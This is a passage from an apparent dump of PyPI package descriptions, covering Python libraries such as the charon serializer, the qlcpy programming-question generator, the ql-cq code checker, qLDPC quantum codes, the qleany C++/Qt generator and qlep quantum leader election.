test.\n.. code:: python\nfrom charon.testing.ast_hash import test_dumpers_version, test_loaders_version\n@pytest.fixture\ndef serializer():\n    return charon.Codec([my_registry])\nFrom this point on, whenever you run pytest, all your loaders and dumpers which have ``class_hash`` defined will be checked against the hash of the current class implementation.\n.. _generating-class-hash:\n---------------------------------------------\nGenerating a hash of a class implementation\n---------------------------------------------\nTo generate the hash of the AST (Abstract Syntax Tree) of a class you can use the script provided with Charon called ``charon_ast_hash``. This script takes a list of classes to be hashed as an argument list.\n.. note:: This command internally uses the ``inspect`` module to get the source code which is then parsed by the ``ast`` module. Methods and classes from ``__builtins__`` and from compiled libraries cannot be hashed.\nExample usage\n--------------\n..
code:: bash$ charon_ast_hash datetime.datetime datetime.timedatetime.datetime: 4927808ca19f2a1494719baa11024a7ddatetime.time: c36b819f18698ee9143ecd92e3788c66Standard Registry=================The Charon package comes with an implementation for some Python types that are built in or in the standard library:* ``decimal.Decimal``* ``set``* ``frozenset``* ``datetime.datetime``* ``datetime.date``* ``datetime.time``* ``datetime.timedelta``This registry can be used by simply creating your ``charon.codec`` with an additional registry``charon.extensions.STANDARD_REGISTRY``.-------------Example usage-------------Basic usage is pretty simple. You just have to create a ``charon.codec`` object with an additional codec registry``charon.extensions.STANDARD_REGISTRY``,preferably at the begining of the list (in case you would want to override standard implementations of dumpers / loaders)... code:: python>>> import charon, charon.extensions>>> import decimal>>> codec = charon.Codec([charon.extensions.STANDARD_REGISTRY])>>> number = decimal.Decimal('4.5')>>> print(number)4.5>>> serialized = codec.dump(number)>>> print(serialized){'!meta': {'dtype': 'Decimal', 'version': 1}, 'params': '4.5'}>>> loaded = codec.load(serialized)>>> print(loaded)4.5"} +{"package": "qlcompiler", "pacakge-description": "The quick lambda compiler takes quick lambda objects from sidekick and compiles\nthem either to Python, C or Javascript code. The goal is to improve\ninteroperability between Python and other languages that can be useful in some\ncommon Python applications.C compilerThe main goal of the C compiler is to help with scientific Python where simple\nand small functions can be defined both in Python and C. The goal is to\nprototype a function in a scientific computation in Python and then later\nconvert it to C and have huge speed gains with very little effort.The main use case is interoperability with Numpy, but it can be used as a simple\ncode generator for other C applications.>>> from sidekick import _\n>>> from qlcompiler import c_compiler\n>>> print(c_compiler.compile(_ + 2))\nvoid function(double _) {\n return _ + 2;\n}Javascript compilerSimilarly to C compiler, the Javascript compiler converts quick lambdas to\nJavascript code. It may be useful in web application in order to share code\nbetween the client and the server.>>> from qlcompiler import js_compiler\n>>> print(js_compiler.compile(_ + 2))\nfunction(_) {\n return _ + 2;\n}"} +{"package": "qlcpy", "pacakge-description": "QLCpyGenerates questions about concrete constructs and patterns in a given Python\nprogram. These questions (including answering options) can be posed to a\nlearner to practice introductory programming. These questions include elements\nto develop program comprehension and program tracing.Automatic generation enables systems to pose the generated questions to leaners\nabout their own programs that they previously programmed. Such Questions About\nLearners' Code (QLCs) may have self-reflection and self-explanation effects\nthat are of interest in computing education research.ReferencesThe concept of Questions About Learners' Code (QLCs) is first introduced by Lehtinen et al. 
inLet's Ask Students About Their Programs, Automatically.Example resultFor the filetest/sample_code.py:fromtypingimportListdeffind_first(words_list:List[str],initial:str)->int:f=Falseforiinrange(len(words_list)):ifwords_list[i].startswith(initial):returnidefcount_average()->None:s=0n=0word=NonewhilewordisNoneorword!='':word=input('Enter number or empty line to count average')try:s+=int(word)n+=1exceptValueError:print('Not a number')ifn>0:print('Average',s/n)print('No numbers')We use the CLI to create one question of each available type:% qlcpy test/sample_code.py --call 'find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")' -n 9 --unique\n Which of the following are variable names in the program? [VariableNames]\n if: A reserved word in programming language [reserved_word]\n input: A function that is built in to programming language [builtin_function]\n * n: A variable in the program [variable]\n other: This word was not used in the program [unused_word]\n * word: A variable in the program [variable]\n\n Which of the following are parameter names of the function declared on line 3? [ParameterNames]\n f: A variable in the program [variable]\n find_first: A name of the function [function]\n i: A variable in the program [variable]\n * initial: A parameter of the function [parameter]\n * words_list: A parameter of the function [parameter]\n\n A program loop starts on line 5. Which is the last line inside it? [LoopEnd]\n 4: The loop starts after this line [line_before_block]\n 6: This line is inside the loop BUT it is not the last one [line_inside_block]\n * 7: Correct, this is the last line inside the loop [last_line_inside_block]\n 8: The loop ends before this line [line_after_block]\n\n A value is accessed from variable i on line 6. On which line is i created? [VariableDeclaration]\n 4: This is a random line that does not handle the given variable [random_line]\n * 5: Correct, this is the line where the variable is created. [declaration_line]\n 6: This line references (reads or assigns) the given variable BUT it is created before [reference_line]\n 7: This line references (reads or assigns) the given variable BUT it is created before [reference_line]\n\n From which line program execution may continue to line 18? [ExceptSource]\n 13: Except-block cannot be entered from outside the corresponding try-block. [before_try_block]\n 15: At least the first line inside try-block starts executing. [try_line]\n * 16: Correct, this line can raise an error of the expected type. [source_line]\n 17: This line does NOT raise an error of the expected type. [not_source_line]\n\n Which of the following best describes the purpose of line 13? [LinePurpose]\n Accepts new data: Incorrect. [read_input]\n Guards against division by zero: Incorrect. [zero_div_guard]\n Ignores unwanted input: Incorrect. [ignores_input]\n * Is a condition for ending program: Correct. [end_condition]\n\n Which of the following best describes the role of variable sthat is created on line 10? [VariableRole]\n A fixed value that is not changed after created: Incorrect. [fixed]\n * A gatherer that combines new values to itself: Correct. [gatherer]\n A stepper that systematically goes through evenly spaced values: Incorrect. [stepper]\n The variable is never accessed and could be removed: Incorrect. [dead]\n\n Line 5 has a loop structure. How many times does the loop execute when running find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")? 
[LoopCount]\n * 4: Correct, this is the number of times the loop executed. [correct_count]\n 5: This number is off by one. [one_off_count]\n 6: This is an incorrect, random number. [random_count]\n 7: This is an incorrect, random number. [random_count]\n\n Line 5 declares a variable named i. Which values and in which order are assigned to the variable when running find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")? [VariableTrace]\n 0, 1, 2: This sequence is missing a value that was assigned to the variable. [miss_value]\n * 0, 1, 2, 3: Correct, these values were assigned in this order to the variable. [correct_trace]\n 3, 1, 0, 2: This is an incorrect, random sequence of values. [random_values]\n 3, 1, 2: This is an incorrect, random sequence of values. [random_values]Installationpip install qlcpyUsageThe package offers a CLI for test prints as well as JSON output. See the example section\nabove for example output. Below is the usage instruction from the command.% qlcpy --help\n usage: __main__.py [-h] [-m] [-c CALL] [-sc SILENT_CALL] [-i INPUT] [-n N]\n [-t TYPES [TYPES ...]] [-u] [-l LANG] [--json]\n [--list-types]\n [program]\n\n QLCpy generates questions that target analysed facts about the given program\n\n positional arguments:\n program A python program file\n\n optional arguments:\n -h, --help show this help message and exit\n -m, --main Run with \"__name__\" = \"__main__\"\n -c CALL, --call CALL A python call to execute\n -sc SILENT_CALL, --silent-call SILENT_CALL\n A python call to execute silently without including it\n in the question prompts\n -i INPUT, --input INPUT\n A text file to use as stdin\n -n N Number of questions (at maximum)\n -t TYPES [TYPES ...], --types TYPES [TYPES ...]\n Only these question types\n -u, --unique Only unique question types\n -l LANG, --lang LANG Language code for the text (en, fi)\n --json Print question data as JSON\n --list-types List available question typesFor programmatic integration the library offers ageneratefunction that offers the same generation options as the CLI command. Type hints are\nincluded andmodels.pydescribes the input and output data. Below\nis an example python program using the library.importqlcpywithopen('test/sample_code.py','r')asf:src=f.read()qlcs=qlcpy.generate(src,[qlcpy.QLCRequest(1,types=['LoopCount','VariableTrace']),qlcpy.QLCRequest(10,fill=True,unique_types=True),],call='find_first([\"lorem\", \"ipsum\", \"dolor\", \"sit\", \"amet\"], \"s\")',)forqlcinqlcs:print(f'{qlc.question}={\", \".join(str(o.answer)foroinqlc.optionsifo.correct)}')importjsonprint(json.dumps(list(qlc.to_dict()forqlcinqlcs)))"} +{"package": "ql-cq", "pacakge-description": "CQCode quality checker packageUsageCheckingJust runcqin the root of your package.$ cq\nrequirements_setup_compatibility\nsetup.py: setup.py: does not contain requirement 'coverage' that is in requirements.txt\ndumb_style_checker\nsetup.py:20: Put exactly one space before and after `=` [... name='.........', ...].\npackage/api.py:191: Put exactly one space before and after `=` [... def fake_localtime(t=None): ...].\npyflakes-ext\nHint: use `# NOQA` comment for disabling pyflakes on particular line\n./tests/test_warnings.py:4: 'types' imported but unused\nmypy\nHint: use `# type: ignore` for disabling mypy on particular line\npackage/api.py:42: error: Need type annotation for 'freeze_factories' (hint: \"freeze_factories: List[] = ...\")\npylint\nHint: use `# pylint: disable=` for disabling line check. 
For a list of violations, see `pylint --list-msgs`\npackage/api.py:56: [W0212(protected-access), ] Access to a protected member _uuid_generate_time of a client class\nYou can specify path to packages that you want to test, if you want to test a whole library/app.\n$ cq package_1 package_2\nCheckers are run in threads. Some of them (e.g. pylint, mypy) spawn an external process so these checkers run in parallel.\nTo disable a certain checker for the whole run add option -d:\n$ cq -d pylint -d branch_name_check\nWarnings are hidden by default. To display them, run cq with --show-warnings\n$ cq --show-warnings\nIf something takes too long use debug output, which will print timing for each checker:\n$ cq --debug\nMost of the checkers support disabling the error in a comment on the respective line. For example in pylint you can use # pylint: disable = protected-access to disable the protected access check in the current context.\nFixing\nJust run cq --fix with the same options as regular cq.\nCheckers\npylint - comprehensive linter\nmypy - checks python typing\npyflakes-ext - another general linter\ngrammar_nazi - grammar/spelling errors\ndumb_style_checker - basic python mistakes (e.g. use of print in a library)\nrequirements_setup_compatibility - validation of version compatibility between setup.py and requirements.txt\nrequirements-validator - requirements.txt validation\nsetup_check - setup.py validator\nbranch_name_check - check whether current branch name complies with Quantlane standards\norange - code formatter based on black\nisort - isort your imports, so you don't have to\nsafety - checks installed dependencies for known security vulnerabilities\nFixers\norange - code formatter based on black\nisort - isort your imports, so you don't have to\npylint\nYou can override the packaged pylint rules in .pylintrc in the root of your project (actually in $PWD/.pylintrc for the cq run)\nPylint checker can output two types of issues: warning and error. Errors are in bold typeset.
Warnings can (but should not) be ignored.mypyConfig can be overridden by havingmypy.iniin the root of your project"} +{"package": "qlda", "pacakge-description": "UNKNOWN"} +{"package": "qldailycheckin", "pacakge-description": "No description available on PyPI."} +{"package": "qldb-orm", "pacakge-description": "makpar-innolabqldb-ormA simpleObject-Relation-Mappingfor a serverlessAWS Quantum Ledger Databasebackend, and a command line utility for querying tables on those ledgers.NOTE: The user or process using this library must have anIAM policy that allows access to QLDB.ORMThe idea behind theORMis to map document fields to native Python object attributes, so that document values can be accessed by traversing the object property tree.CRUD OPERATIONSfromqldb_orm.qldbimportDocument# Create a document on `my_table` table.document=Document('my_table')document.field={'nested_data':{'array':['colllection','of','things']}}document.save()fromqldb_orm.qldbimportDocument# Load a document from `my_table` table.document=Document('my_table',id=\"123456\")forvalindocument.field.nested_data.array:print(val)Queriesfromqldb_orm.qldbimportQueryquery=Query('my-table').find_by(field_name='field value')fordocumentinquery:print(f'Document({document.id}).field_name ={document.field_name}')CLICRUD Operationsqldb-orm--tableyour-table--insertcol1=val1col2=val2...\nqldb-orm--tableyour-table--id123--updatecol1=newval1col2=newval2Queriesqldb-orm--tableyour-table--findcolumn=thisRead The Docsqldb-orm documentationCode Quality"} +{"package": "qldbshell", "pacakge-description": "Amazon QLDB ShellThis tool provides an interface to send PartiQL statements toAmazon Quantum Ledger Database (QLDB).\nThis tool is not intended to be incorporated into an application or adopted for production purposes.\nThe objective of the tool is to give developers, devops, database administrators, and anyone else interested the opportunity for rapid experimentation with QLDB andPartiQL.PrerequisitesBasic ConfigurationSeeAccessing Amazon QLDBfor information on connecting to AWS.Python 3.4 or laterThe shell requires Python 3.4 or later. Please see the link below for more detail to install Python:Python InstallationGetting StartedInstall the QLDB Shell using pip:pip3 install qldbshellInvocationThe shell can then be invoked by using the following command:$qldbshell--region--ledgerAn example region code that can be used is us-east-1.\nThe currently avaiable regions are addressed in theQLDB General Referencepage.\nBy default, the shell will use the credentials specified as environment variables and then in the default profile mentioned in~/.aws/credentials/(default location set in the AWS_SHARED_CREDENTIALS_FILE environment variable) and then the default profile in~/.aws/config(default location set in AWS_CONFIG_FILE environment variable).\nVarious optional arguments can be added to override the profile, endpoints, and region used. To view the arguments, execute the following:$qldbshell--helpExample UsageAssuming that the ledger, \"test-ledger\" has already been created:$qldbshell--regionus-east-1--ledgertest-ledger\nqldbshell>CREATETABLETestTable\nqldbshell>INSERTINTOTestTable`{\"Name\":\"John Doe\"}`qldbshell>SELECT*FROMTestTable\nqldbshell>exitWe use backticks in the example above since we use are using Ion literals. For more on querying Ion literals, gohere.\nEach statement except exit is considered as a transaction.See alsoAmazon QLDB accepts and storesAmazon IONDocuments. 
Amazon Ion is a richly-typed, self-describing, hierarchical data serialization format offering interchangeable binary and text representations. For more information read theION docs.Amazon QLDB supports thePartiQLquery language. PartiQL provides SQL-compatible query access across multiple data stores containing structured data, semistructured data, and nested data. For more information read thePartiQL docs.We use backticks in our example since we use are using Ion literals. For more on querying Ion with PartiQL, gohere.DevelopmentSetting up the ShellClone the repository using:git clone --recursive https://github.com/awslabs/amazon-qldb-shell.gitAfter cloning the repository, activate a virtual environment and install the package by running:$virtualenvvenv\n...\n$.venv/bin/activate\n$pip3install-rrequirements.txt\n$pip3install-e.LicenseThis tool is licensed under the Apache 2.0 License."} +{"package": "qldebugger", "pacakge-description": "Queue Lambda DebuggerUtility to debug AWS lambdas with SQS messages."} +{"package": "ql-demo", "pacakge-description": "UNKNOWN"} +{"package": "qldev", "pacakge-description": "No description available on PyPI."} +{"package": "qLDPC", "pacakge-description": "qLDPCThis package contains tools for constructing and analyzingquantum low density partity check (qLDPC) codes.\ud83d\udce6 InstallationThis package requires Python>=3.10, and can be installed from PyPI withpip install qldpcTo install a local version from source:git clone git@github.com:Infleqtion/qLDPC.git\npip install -e qLDPCYou can alsopip install -e 'qLDPC[dev]'to additionally install some development tools.\ud83d\ude80 FeaturesNotable features include:abstract.py: module for basic abstract algebra (groups, algebras, and representations thereof).ClassicalCode: class for representing classical linear error-correcting codes over finite fields.QuditCode: general class for constructingGalois-qudit codes.CSSCode: general class for constructingquantum CSS codesout of two mutually compatibleClassicalCodes.CSSCode.get_logical_ops: method to construct a complete basis of nontrivial logical operators for aCSSCode.CSSCode.get_distance: method to compute the code distance (i.e., the minimum weight of a nontrivial logical operator) of aCSSCode. Includes options for computing a lower bound (determined by the distances of the underlyingClassicalCodes), an upper bound (with the method ofarXiv:2308.07915), and the exact code distance (with an integer linear program).Includes options for applying local Hadamard transforms, which is useful for tailoring aCSSCodeto biased noise (seearXiv:2202.01702). Options to apply more general Clifford code deformations are pending.GBCode: class for constructinggeneralized bicycle codes, as described inarXiv:1904.02703.QCCode: class for constructing thequasi-cyclic codesinarXiv:2308.07915.HGPCode: class for constructinghypergraph product codesout of twoClassicalCodes.LPCode: class for constructinglifted product codesout of two protographs (i.e., matrices whose entries are elements of a group algebra). SeearXiv:2012.04068andarXiv:2202.01702.QTCode: class for constructingquantum Tanner codesout of (a) two symmetric subsetsAandBof a groupG, and (b) twoClassicalCodes with block lengths|A|and|B|. SeearXiv:2202.13641andarXiv:2206.07571.\ud83e\udd14 Questions and issuesIf this project gains interest and traction, I'll add a documentation webpage and material to help users get started quickly. I am also planning to write a paper that presents and explains this project. 
In the meantime, you can explore the documentation and explanations in the source code.qldpc/codes_test.pycontains some examples of using the classes and methods described above.If you have any questions, feedback, or requests, pleaseopen an issue on GitHubor email me atmichael.perlin@infleqtion.com!\u2693 AttributionIf you use this software in your work, please cite with:@misc{perlin2023qldpc,\n author = {Perlin, Michael A.},\n title = {{qLDPC}},\n year = {2023},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/Infleqtion/qLDPC}},\n}This may require adding\\usepackage{url}to your LaTeX file header. Alternatively, you can citeMichael A. Perlin. qLDPC. https://github.com/Infleqtion/qLDPC, 2023."} +{"package": "qleany", "pacakge-description": "Qleany - Clean Architecture Framework for C++/Qt6 ProjectsQleany is a streamlined framework designed to integrate Clean Architecture principles within C++ Qt6 applications. It is built on three core components:Qleany C++/Qt Library: Provides a range of common and generic tools and classes essential for implementing Clean Architecture in C++/Qt projects.Python/Jinja2 Project Structure Generator: Features a dedicated user interface developed using PySide. This generator facilitates the creation of a structured project environment based on the principles of Clean Architecture.Examples and Documentation: A collection of examples to guide users in implementing the framework effectively.Important NoticesPlease avoid using Qt Design Studio version 4.3 (which utilizes Qt 6.6) due to a known issue that impacts Qt versions 6.5.3 and 6.6. This bug can cause crashes in previews (qml2puppet) when working with QML mocks generated by Qleany. We recommend using Qt Design Studio LTS version 4.1 instead, as it is based on Qt 6.5.1 and does not exhibit this problem. Qt Design Studio 4.4 preview seems to run well with Qleany.Framework's ObjectiveQleany's primary goal is to automate the generation of a structured project environment for C++/Qt6 applications. This is achieved by interpreting a simple manifest file, namedqleany.yaml, located at the root of the project. The framework generates a comprehensive structure including folders, CMakeLists.txt, and essential C++ files. The generated projects support both QWidget and QML GUIs or a combination of both. Upon initial generation, the projects are immediately compilable, requiring developers only to design GUIs and implement custom use cases.The framework acknowledges the repetitive nature of file creation in Clean Architecture and addresses this by automating the generation of similar files. Additional features include:An asynchronous undo-redo system based on the command pattern.A SQLite-based database layer for data persistence.Support for custom use cases with user-defined DTOs (Data Transfer Objects) for inputs and outputs.The ability to define both soft and hard relationships between entities, including one-to-one and one-to-many (unordered or ordered) associations.Entities within the framework handle cascade deletion. Additionally, the implementation of soft-deletion (recoverable trash binning) is currently in progress.Framework StructureMany developers are likely familiar with the following depiction of Clean Architecture:It's important to note that this conceptual representation needs to be tailored to fit the specific requirements of the language and project at hand. 
Qleany presents a distinct interpretation of Clean Architecture, uniquely adapted and structured to suit its specific use cases and environment.Domain: Contains entities and is encapsulated in a library nameddomain.Application: Groups use cases by functionalities, organized within a library calledapplication.Persistence: Manages internal data persistence. It includes a 'repository' wrapper for SQLite database interactions, with each entity having its repository in theRepositoryProviderclass.Contracts: A common library for most other components, housing all interfaces frompersistence,gateway, andinfrastructure. This design minimizes tight coupling and circular dependencies.DTO Libraries: Each functionality has its DTO library, facilitating communication with theapplicationlayer. DTOs are used for both input and output in interactions with the outer layers, such as interactors.Gateway: Optional library for handling remote connections and services. It can be manually added by the developer and is used similarly to repositories in use cases.Infrastructure: Optional. Handles actions like file management, local settings, and system queries. It's injected into use cases similar to repositories and gateways.Interactor: Acts as an internal API to invoke use cases, streamlining the interaction between the user interface and application logic.Presenter: Maintains Qt models and representations of unique entities (referred to asSingles), enhancing their integration and usage within the GUI.Registration: Each component (persistence,gateway,infrastructure,interactor) initializes its classes in a correspondingname_registration.cpp file, typically called together in the main.cpp.Project dependencies:Example of project structure:Utilizing the Qleany GUI InterfaceQleany tooling can be installed usingpip install qleany.To access Qleany's user-friendly graphical interface, runqleanyin a terminal. This interface allows developers to efficiently manage file generation. This is the recommended way to generate files.Run the Qleany GUI:Launch Qleany's graphical user interface by executing the scriptgenerator/qleany_generator_ui.py.Select theqleany.yamlFile:Begin by choosing your project'sqleany.yamlfile. This configuration file is essential for the GUI to operate correctly.List Available Files:In the GUI, use the \"list\" button for each component. This will generate a list of files that can be created for that component.Select Files to Generate:Choose the files you want to generate from the provided list, depending on your project requirements.Preview Files:Opt for the \"preview\" feature to generate and inspect the selected files in a \"preview\" folder. The location of this folder is defined in yourqleany.yamlfile.Generate Files:After previewing, proceed to generate the files by clicking the \"generate\" button. This will create the files in their designated locations within your project.Overwrite Confirmation:Should the file generation process require overwriting existing files, a warning message will appear. This alert ensures you are informed about and agree to the upcoming changes to your current files.Alternatively, you can list and generate all the files of the project.Qleany YAML Configuration RulesTheqleany.yamlfile is the core configuration file for the Qleany framework. A working example can be foound inexample/simple/qleany.yaml. 
Below are the rules and structure for defining the configuration:Global Settingsglobal:application_name:SimpleExampleapplication_cpp_domain_name:Simpleorganisation:name:simpleexampledomain:qleany.euEntities DefinitionDefines entities and their properties. Setting parent to EntityBase (provided by Qleany) offers the \"id\" field of type \"int\". It's mandatory to use EntityBase as heritage.entities:list:-name:EntityNameparent:ParentEntityonly_for_heritage:true/falsefields:# basic:-type:DataTypename:fieldNamehidden: true/false (default:false)# one-to-one relationship:-type:OtherEntityNamename:fieldNamestrong:true/falsehidden: true/false (default:false)# one-to-many relationship:-type:QListname:fieldNamestrong:true/falseordered:true/falsehidden: true/false (default:false)# other fields ...# other entitiesexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hfolder_path:path/to/entity/folderRepositories ConfigurationSpecifies settings for entity repositories.repositories:list:-entity_name:EntityNamelazy_loaders:true/false# other repositories, typically one for each entityinterface_path:path/to/interfaceexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hrepository_folder_path:path/to/repository/folderbase_folder_path:path/to/base/folderInteractor SettingsConfigures interactor-specific settings.interactor:folder_path:path/to/interactor/folderexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hcreate_undo_redo_interactor:true/falseApplication Layer ConfigurationDefines application-specific settings and CRUD operations.application:common_cmake_folder_path:path/to/application/folderfeatures:-name:FeatureNameDTO:dto_identical_to_entity:enabled:true/falseentity_mappable_with:EntityNameCRUD:enabled: true/false (default:false)entity_mappable_with:EntityNameget:enabled:true/falseget_all:enabled:true/falseget_with_details:enabled:true/falsecreate:enabled:true/falseremove:enabled:true/falseupdate:enabled:true/falseinsert_relation:enabled:true/falseremove_relation:enabled:true/falsecommands:-name:CommandNameentities:-EntityNamevalidator:enabled:true/falseundo:true/falsedto:in:enabled: true/false (default:true)type_prefix:CommandNamefields:-type:DataTypename:fieldNameout:enabled: true/false (default:true)type_prefix:CommandNameReplyfields:-type:DataTypename:fieldNamequeries:-name:QueryNameentities:-EntityNamevalidator:enabled:true/falseundo:false (useless for queries)dto:in:enabled: true/false (default:true)type_prefix:QueryNamefields:-type:DataTypename:fieldNameout:type_prefix:QueryNameReplyfields:-type:DataTypename:fieldNameDTOs (Data Transfer Objects) ConfigurationDTOs:common_cmake_folder_path:path/to/dtos/folderContracts ConfigurationDefines settings for contracts in the application.contracts:inverted_app_domain:domain.identifierfolder_path:path/to/contracts/folderexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hPresenter SettingsConfigures presenter-specific settings. Note: thenamecan be set toautopresenter:folder_path:path/to/presenter/folderexport:EXPORT_MACRO_NAMEexport_header_file:header_file_name.hcreate_undo_and_redo_singles:true/false (default false)singles:-name:SingleName (or \"auto\")entity:EntityNameread_only: true/false (default:false)# Additional singles...list_models:-name:ListModelName (or auto)entity:EntityNamedisplayed_field:fieldNamein_relation_of:RelationEntityrelation_field_name:relationFieldNameread_only: true/false (default:false)# Additional list models...QML ConfigurationSpecifies paths for QML folder. 
The folders mock_imports and real_imports will be created in it.qml:folder_path:path/to/qml/folderMIT LicenseCopyright (c) 2023 Cyril JacquetPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qlearning", "pacakge-description": "No description available on PyPI."} +{"package": "qlearnkit", "pacakge-description": "Qlearnkit python libraryQlearnkit is a simple python library implementing some fundamental Machine Learning models and algorithms for a gated quantum computer, built on top ofQiskitand, optionally,Pennylane.InstallationWe recommend installingqlearnkitwith pippipinstallqlearnkitNote:pip will install the latest stable qlearnkit.\nHowever, the main branch of qlearnkit is in active development. If you want to test the latest scripts or functions please refer todevelopment notes.Optional InstallVia pip, you can installqlearnkitwith the optional extension\npackages dependent onpennylane. 
To do so, runpipinstallqlearnkit['pennylane']Docker ImageYou can also use qlearnkit via Docker building the image from the providedDockerfiledockerbuild-tqlearnkit-fdocker/Dockerfile.then you can use it like thisdockerrun-it--rm-v$PWD:/tmp-w/tmpqlearnkitpython./script.pyGetting started with QlearnkitNow that Qlearnkit is installed, it's time to begin working with the Machine Learning module.\nLet's try an experiment using the QKNN Classifier algorithm to train and test samples from a\ndata set to see how accurately the test set can be classified.fromqlearnkit.algorithmsimportQKNeighborsClassifierfromqlearnkit.encodingsimportAmplitudeEncodingfromqiskitimportBasicAerfromqiskit.utilsimportQuantumInstance,algorithm_globalsfromqlearnkit.datasetsimportload_irisseed=42algorithm_globals.random_seed=seedtrain_size=32test_size=8n_features=4# all features# Use iris data set for training and test dataX_train,X_test,y_train,y_test=load_iris(train_size,test_size,n_features)quantum_instance=QuantumInstance(BasicAer.get_backend('qasm_simulator'),shots=1024,optimization_level=1,seed_simulator=seed,seed_transpiler=seed)encoding_map=AmplitudeEncoding(n_features=n_features)qknn=QKNeighborsClassifier(n_neighbors=3,quantum_instance=quantum_instance,encoding_map=encoding_map)qknn.fit(X_train,y_train)print(f\"Testing accuracy: \"f\"{qknn.score(X_test,y_test):0.2f}\")DocumentationThe documentation is availablehere.Alternatively, you can build and browse it locally as follows:first make sure to havepandocinstalledsudoaptinstallpandocthen runmakedocthen simply opendocs/_build/index.htmlwith your favourite browser, e.g.bravedocs/_build/index.htmlDevelopment notesAfter cloning this repository, create a virtual environmentpython3-mvenv.venvand activate itsource.venv/bin/activatenow you can install the requirementspipinstall-rrequirements-dev.txtnow run the testsmaketestMake sure to runpre-commitinstallto set up the git hook scripts. Nowpre-commitwill run automatically ongit commit!AcknowledgmentsThe Quantum LSTM model is adapted from thisarticlefrom Riccardio Di Sipio, but the Quantum part\nhas been changed entirely according to the architecture described in thispaper."} +{"package": "qleda", "pacakge-description": "QLEDAQLEDA is a python project to read or create schematics and netlists.\nThe data model uses the popular frameworkSQLAlchemy.\nTherfore the created data can be stored in either aPostgreSQLdatabase or in aSQLitedatabase.Coding RulesIn generalPython Style Guide PEP 8should be respected.SQL Alchemyrelationship:If files are on the same hierarchy (same package) use 'back_populates' wherever possible since it improves code\nreadability.\nIf a package/class e.g. 'B' depends on package 'A' but 'A' not on 'B', use 'backref' in order to avoid unnecessary\ndependencies.Table namesTable names shall be lowercase of the Class name with an underscore. It's allowed to shorten the name where it makes sense.FileStructurecommon/TBDcore/all basic functionalities are heredrawing/everything related to graphical representationpypads/importer function to read library and schemtic data from PADS Logic ascii files.TestingAdd unittests in a subfolder namedtest. 
Name every unittest filetest_+file_to_test.\nTo run all tests run:python-munittestdiscover-t./-sqleda/from the project base directory.SetupAt least Python 3.9 is required.\nInstallrequirements.txt."} +{"package": "qleet", "pacakge-description": "qLEETis an open-source library for exploringLoss landscape,Expressibility,Entangling capabilityandTraining trajectoriesof noisy parameterized quantum circuits.Key FeaturesWill supportQiskit\u2019s,Cirq\u2019sandpyQuil'squantum circuitsandnoise models.Provides opportunities to improve existing algorithms likeVQE,QAOAby utilizing intuitive insights from the ansatz capability and structure of loss landscape.Facilitate research in designing new hybrid quantum-classical algorithms.InstallationqLEET requires Python version 3.7 and above. Installation of qLEET, as well as all its dependencies, can be done using pip:python -m pip install qleetExamplesProperties of an AnsatzAnsatzExpressibility and Entanglement SpectrumSolving MAX-CUT using QAOAProblem GraphLoss Landscape and Training TrajectoriesContributing to qLEETWe love your input! We want to make contributing to this project as easy and transparent as possible, whether it's:Reporting a bugSubmitting a fixProposing new featuresFeel free to open an issue on this repository or add a pull request to submit your contribution. Adding test cases for any contributions is a requirement for any pull request to be mergedFinancial SupportThis project has been supported byUnitary Fund.LicenseqLEET isfreeandopen source, released under the Apache License, Version 2.0.ReferencesExpressibility and Entangling Capability of Parameterized Quantum Circuits for Hybrid Quantum\u2010Classical Algorithms, Sim, S., Johnson, P. D., & Aspuru\u2010Guzik, A. Advanced Quantum Technologies, 2(12), 1900070. Wiley. (2019)Visualizing the Loss Landscape of Neural Nets, Hao Li, Zheng Xu, Gavin Taylor, Christoph Studer, Tom Goldstein, NIPS 2018, arXiv:1712.09913 [cs.LG] (2018)"} +{"package": "qlep", "pacakge-description": "Quantum Leader Election Protocols (QLEP)DescriptionThe current project propose a template for developing and testing quantum leader election protocols. 
Most of the research protocols are implemented and can be compared with new proposals.\nThe scope of the project is to contain all the protocols in a single repository and to be able to compare them on the same benchmarks.InstallpipinstallqlepUse of AWS providerFollow instructionshttps://aws.amazon.com/blogs/quantum-computing/setting-up-your-local-development-environment-in-amazon-braket/exportAWS_ACCESS_KEY_ID=YOUR_AWS_ACCESS_KEY_IDexportAWS_SECRET_ACCESS_KEY=YOUR_AWS_SECRET_ACCESS_KEYexportAWS_DEFAULT_REGION=us-west-1Use of IBM providerFollow instructionshttps://github.com/Qiskit/qiskit-ibm-providerfromqiskit_ibm_providerimportIBMProviderIBMProvider.save_account('YOUR_IBM_TOKEN')Latex for plotssudoapt-getinstall-ytexlive-latex-base\nsudoapt-getinstall-ytexlive-latex-extra\nsudoapt-getinstall-ydvipng\nsudoapt-getinstall-ycm-superUsageimportqlepqdp=qlep.core.QuantumDataProvider(provider=qlep.core.Provider.AER,backend_name=\"aer_simulator\")committee=qlep.core.CommitteeType.ALL.get_committee(no_nodes=8,committee_size=8)current_qlep=qlep.ecc.WalshQLEP(no_nodes=8,no_elections=10,quantum_data_provider=qdp,committee=committee)current_qlep.generate_quantum_data()current_qlep.simulate_elections()# only if latex is 